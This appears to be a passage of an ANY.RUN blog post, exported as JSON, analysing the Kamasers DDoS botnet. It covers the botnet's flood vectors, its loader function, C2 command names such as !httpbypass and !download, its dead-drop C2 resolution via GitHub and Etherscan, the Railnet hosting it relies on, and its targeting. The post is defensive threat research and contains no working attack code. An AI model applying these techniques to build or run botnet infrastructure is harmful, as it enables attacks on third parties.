{"id":19450,"date":"2026-03-25T10:20:25","date_gmt":"2026-03-25T10:20:25","guid":{"rendered":"\/cybersecurity-blog\/?p=19450"},"modified":"2026-03-27T09:07:17","modified_gmt":"2026-03-27T09:07:17","slug":"kamasers-technical-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/kamasers-technical-analysis\/","title":{"rendered":"Kamasers\u00a0Analysis: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide\u00a0"},"content":{"rendered":"\n<p>DDoS attacks are no longer only an infrastructure problem. They can quickly turn into a <strong>business issue<\/strong>, affecting uptime, customer experience, and operational stability. Kamasers is a strong example of this new reality, with broad attack capabilities and resilient command-and-control mechanisms that allow it to remain active under pressure.<\/p>\n\n\n\n<p>Let\u2019s explore the Kamasers botnet through both <strong>technical and <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">behavioral analysis<\/a><\/strong>, looking at the commands it receives, the geographic distribution of its attacks, and the functions implemented in the malware sample. Together, these elements help reveal how Kamasers operates and why it poses a serious threat to organizations worldwide<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Key Takeaways&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kamasers&nbsp;is a sophisticated&nbsp;<strong>DDoS botnet<\/strong>&nbsp;that supports both&nbsp;application-layer and transport-layer attacks, including HTTP, TLS, UDP, TCP, and&nbsp;GraphQL-based flooding.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The malware can also act as a <strong>loader<\/strong>, downloading and executing additional payloads, which raises the risk of <strong>further compromise, data theft, and ransomware deployment<\/strong>.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Its&nbsp;<strong>C2 infrastructure is resilient<\/strong>, using a&nbsp;Dead Drop Resolver (DDR)&nbsp;through legitimate public services such as&nbsp;GitHub Gist, Telegram, Dropbox, Bitbucket, and even&nbsp;Etherscan&nbsp;to retrieve&nbsp;active C2 addresses.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Analysis showed that&nbsp;<strong>Railnet&nbsp;ASN<\/strong>&nbsp;repeatedly appeared in malicious activity tied to multiple malware families, making it a notable infrastructure element in the broader threat landscape.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kamasers&nbsp;was&nbsp;observed&nbsp;being distributed through&nbsp;<strong>GCleaner<\/strong>&nbsp;and&nbsp;<strong>Amadey<\/strong>, showing that it fits into established malware delivery chains.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The botnet\u2019s activity is <strong>international<\/strong>, with strong submission visibility in <strong>Germany and the United States<\/strong>, while targeting extends across sectors including <strong>education, telecom, and technology<\/strong>.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">The Business Risk Behind&nbsp;Kamasers&nbsp;<\/h2>\n\n\n\n<p>Kamasers&nbsp;is a flexible attack platform that can turn compromised enterprise systems into operational liabilities, external attack infrastructure, and potential entry points for deeper compromise:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Corporate infrastructure can be turned against others:<\/strong>&nbsp;Infected enterprise systems may be used to launch DDoS attacks on third parties, creating reputational, contractual, and even legal risk for the organization.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>A broader incident can follow quickly:<\/strong>&nbsp;Because&nbsp;Kamasers&nbsp;can function as a loader, a single infection may lead to&nbsp;additional&nbsp;payload delivery, raising the risk of data theft, ransomware, and deeper intrusion.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Visibility gaps become harder to defend:<\/strong>&nbsp;The malware uses legitimate public services to retrieve C2 information, making malicious communication more difficult to detect and increasing the chance of delayed response.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Response costs rise fast:<\/strong>&nbsp;Investigating infected hosts,&nbsp;validating&nbsp;external impact, restoring systems, and handling&nbsp;possible IP&nbsp;blacklisting can create significant operational and financial strain.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Business trust can be affected early:<\/strong>&nbsp;If company&nbsp;infrastructure is linked to malicious traffic, customers, partners, and providers may react before the full incident is even understood.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Kamasers&nbsp;highlights a serious enterprise risk:&nbsp;attackers can use resilient C2 discovery, flexible attack methods, and follow-on payload delivery to turn a single compromise into an incident with operational, financial, compliance, and reputational consequences.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nGain <span class=\"highlight\">earlier visibility\n<\/span>into disruptive threats <br><span class=\"highlight\">Reduce the risk<\/span> of downtime, pressure, and loss\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=kamasers-technical-analysis&#038;utm_term=250326&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower up your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">Kamasers&nbsp;Threat&nbsp;Overview&nbsp;<\/h2>\n\n\n\n<p>Kamasers&nbsp;is a malware botnet family designed to carry out DDoS attacks using both application-layer and transport-layer vectors. It supports HTTP GET\/POST floods, API-targeted attacks, defense evasion techniques, TLS handshake exhaustion, connection-holding methods, as well as UDP and TCP floods. Infected nodes receive commands from the command-and-control infrastructure and generate&nbsp;the corresponding&nbsp;traffic. In addition,&nbsp;Kamasers&nbsp;can also function as a loader, downloading and executing files from the network.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>&nbsp;previously observed activity associated with&nbsp;<a href=\"https:\/\/x.com\/anyrun_app\/status\/2001261257966412087?s=20\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Udados<\/strong><\/a>, which is&nbsp;most likely an&nbsp;evolution or updated version of&nbsp;Kamasers. As such,&nbsp;Udados&nbsp;can be considered part of the&nbsp;Kamasers&nbsp;family.&nbsp;<\/p>\n\n\n\n<p>You can find public&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">sandbox&nbsp;analysis<\/a>&nbsp;sessions related to the&nbsp;Kamasers&nbsp;family&nbsp;with the following Threat Intelligence&nbsp;Lookup&nbsp;query:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22kamasers%5C%22%22,%22dateRange%22:30}\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;kamasers&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1024x446.png\" alt=\"ANY.RUN\u2019s\u00a0sandbox\u00a0sessions related to the\u00a0Kamasers\u00a0attacks\" class=\"wp-image-19465\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1024x446.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-300x131.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-768x334.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1536x669.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-2048x892.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-370x161.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-270x118.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-740x322.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s&nbsp;sandbox&nbsp;sessions related to the&nbsp;Kamasers&nbsp;attacks displayed inside TI&nbsp;Lookup<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>If a corporate host becomes part of a botnet and is used to carry out DDoS attacks, the organization may face financial risks related to incident response, system recovery, network costs, and potential contractual penalties, as well as regulatory scrutiny if inadequate security measures are identified, especially in cases involving data compromise.&nbsp;<\/p>\n\n\n\n<p>An&nbsp;additional&nbsp;risk stems from the malware\u2019s ability to act as a loader, downloading and executing third-party payloads. This increases the likelihood of further intrusion, data exfiltration, ransomware deployment, and the resulting operational and reputational damage.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">C2 and Infrastructure&nbsp;&nbsp;<\/h2>\n\n\n\n<p>As part of the analysis, it was&nbsp;observed&nbsp;that the bot received the !httpbypass&nbsp;control command, which&nbsp;initiates&nbsp;an HTTP flood attack against a specified URL with defined intensity and duration parameters.&nbsp;After completing the attack, the bot reported its status and returned to standby mode.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/232034c5-de22-4eb4-a3ab-62e58d041205?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View analysis session<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"901\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-1024x901.png\" alt=\"Communication between the infected host and the C2 server\" class=\"wp-image-19467\" style=\"width:516px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-1024x901.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-300x264.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-768x676.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-370x326.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-270x238.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2-740x651.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image2-2.png 1432w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Communication between the infected host and the C2 server<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>&nbsp;In the&nbsp;sandbox&nbsp;analysis&nbsp;session,&nbsp;we can see how&nbsp;a&nbsp;DDoS attack targets&nbsp;a domain:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"236\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-1024x236.png\" alt=\"DDoS attack targeting a domain, exposed inside\u00a0ANY.RUN\u00a0sandbox\u00a0\" class=\"wp-image-19468\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-1024x236.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-300x69.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-768x177.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-1536x355.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-370x85.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-270x62.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1-740x171.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image3-1.png 1732w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>DDoS attack targeting a domain, exposed inside&nbsp;ANY.RUN&nbsp;sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>In a number of&nbsp;analysis&nbsp;sessions, the command-and-control server was used not only to coordinate DDoS activity, but also to deliver additional payloads.&nbsp;Specifically, the bot received&nbsp;the&nbsp;<em>!download<\/em>command, after which it downloaded and executed a file from an external domain, then confirmed successful&nbsp;session&nbsp;completion to the C2 server:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/2127c60a-1cfa-4c40-aa97-b6a68491a1d9?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View analysis session<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"875\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-1024x875.png\" alt=\"Example of a C2 command used to download a malicious file\" class=\"wp-image-19469\" style=\"width:528px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-1024x875.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-300x256.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-768x656.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-370x316.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-270x231.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4-740x632.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image4.png 1444w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Example of a C2 command used to download a malicious file<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In one observed case, the bot received the<em>&nbsp;!descargar<\/em>&nbsp;command,&nbsp;the Spanish-language equivalent&nbsp;of&nbsp;<em>!download,<\/em>&nbsp;to retrieve an executable file from an external domain.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/80effde1-3534-4cf8-8f85-fdd12e3fb163?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View analysis session with&nbsp;C2 command in Spanish<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"497\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-1024x497.png\" alt=\"C2 command in Spanish used to download a malicious file\" class=\"wp-image-19470\" style=\"width:618px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-1024x497.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-300x146.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-768x373.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-370x180.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-270x131.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3-740x359.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image5-3.png 1426w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>C2 command in Spanish used to download a malicious file&nbsp;observed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In some cases, the&nbsp;Kamasers&nbsp;botnet was&nbsp;observed&nbsp;using public blockchain infrastructure as an auxiliary mechanism for obtaining the C2 address. Specifically, infected hosts queried the&nbsp;<strong>Etherscan&nbsp;API<\/strong>(api.etherscan.io) to retrieve data&nbsp;containing&nbsp;the URL of the command-and-control server:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/0c910c38-531d-4df4-86b9-19902487edc3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View session querying the&nbsp;Etherscan&nbsp;API<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"332\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-1024x332.png\" alt=\"Querying the\u00a0Etherscan\u00a0API\u00a0(api.etherscan.io) to retrieve data\" class=\"wp-image-19471\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-1024x332.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-300x97.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-768x249.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-1536x498.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-2048x664.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-370x120.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-270x87.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image6-740x240.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Querying the&nbsp;Etherscan&nbsp;API&nbsp;(api.etherscan.io) to retrieve data<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>After obtaining the URL, the bot connects to the C2 server and sends information about its ID, command execution status, bot version, privileges on the infected host, C2 discovery source, and system information:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"603\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-1024x603.png\" alt=\"Victim request to the C2 server\u00a0\" class=\"wp-image-19472\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-1024x603.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-300x177.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-768x453.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-370x218.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-270x159.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1-740x436.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image7-1.png 1422w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Victim request to the C2 server<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>In&nbsp;a number of&nbsp;cases,&nbsp;Kamasers&nbsp;uses public services, including&nbsp;<strong>GitHub<\/strong>, as an auxiliary source of configuration:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/1d4d2a6f-38de-4e5d-bf86-a1a66857aff1?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">Check&nbsp;how Kamasers uses public services<\/a>&nbsp;&nbsp;<\/p>\n\n\n\n<p>Behavioral analysis of Kamasers showed that the botnet frequently establishes connections to IP addresses associated with <strong>Railnet LLC\u2019s ASN<\/strong>.<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">Catch emerging threats in \n<span class=\"highlight\">under 60 seconds\n<\/span> <br> <span class=\"highlight\">Reduce\u00a0time to verdict <\/span> with clear behavioral evidence\n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=kamasers-technical-analysis&#038;utm_term=250326&#038;utm_content=linktoregistration\" rel=\"noopener\" target=\"_blank\">\nRegister now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p><strong>Railnet<\/strong>&nbsp;is regularly mentioned in public reporting as a legitimate front for the hosting&nbsp;provider <strong>Virtualine<\/strong>. This provider is known for the absence of KYC procedures, and some research has noted that the associated infrastructure is used to host malicious services and&nbsp;facilitate&nbsp;attacks.&nbsp;<\/p>\n\n\n\n<p>Railnet&nbsp;infrastructure has previously been&nbsp;observed&nbsp;in campaigns targeting both government and private-sector organizations across several European countries, including Switzerland, Germany, Ukraine, Poland, and France.&nbsp;<\/p>\n\n\n\n<p>There are also documented cases of&nbsp;<strong>Railnet<\/strong>&nbsp;infrastructure being used to distribute other malware families, including&nbsp;<strong>Latrodectus<\/strong>, which&nbsp;a number of&nbsp;reports link to activity associated with groups such as&nbsp;<strong>TA577<\/strong>.&nbsp;<\/p>\n\n\n\n<p>At the time of analysis,&nbsp;<strong>ANY.RUN<\/strong>&nbsp;data showed that&nbsp;<strong>Railnet\u2019s&nbsp;ASN<\/strong>&nbsp;consistently appeared in reports tied to a wide range of malicious activity and was being used by multiple malware families. These were not isolated incidents, but a recurring pattern: the same ASN was repeatedly involved across different campaigns, making it a convenient infrastructure hub for threat actors.&nbsp;<\/p>\n\n\n\n<p>The current picture of&nbsp;<strong>Railnet<\/strong>&nbsp;activity can be quickly verified using&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN\u2019s&nbsp;Threat Intelligence&nbsp;Lookup<\/strong><\/a>. Searching by ASN makes it possible to assess how extensively it is involved in malicious chains, which malware families interact with it, and how the nature of that activity changes over time:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolookup#{%22query%22:%22destinationIpAsn:%5C%22railnet%5C%22%22,%22dateRange%22:180}\" target=\"_blank\" rel=\"noreferrer noopener\">destinationIpAsn:&#8221;railnet&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"391\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-1024x391.png\" alt=\"\" class=\"wp-image-19492\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-1024x391.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-300x114.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-768x293.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-1536x586.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-370x141.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-270x103.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1-740x282.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/railnet_1.png 1824w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Query for RAILNET ASN in&nbsp;ANY.RUN\u2019s TI&nbsp;Lookup<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>In the analyzed sandbox sessions, Kamasers was distributed via <strong>GCleaner<\/strong> and <strong>Amadey<\/strong>, a delivery pattern that has also been observed in other DDoS campaigns.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Attack Geography and Targeting&nbsp;<\/h2>\n\n\n\n<p>Among the observed&nbsp;<strong>DDoS<\/strong>&nbsp;targets were companies in the&nbsp;<strong>LATAM<\/strong>&nbsp;region. However, according to&nbsp;<strong>ANY.RUN\u2019s&nbsp;threat&nbsp;intelligence&nbsp;<\/strong>data, the targeting profile is broader: the education sector is affected most often, along with telecommunications and technology organizations.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-1024x555.png\" alt=\"\" class=\"wp-image-19493\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-1024x555.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-300x163.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-768x416.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-1536x832.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-370x200.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-270x146.png 270w, 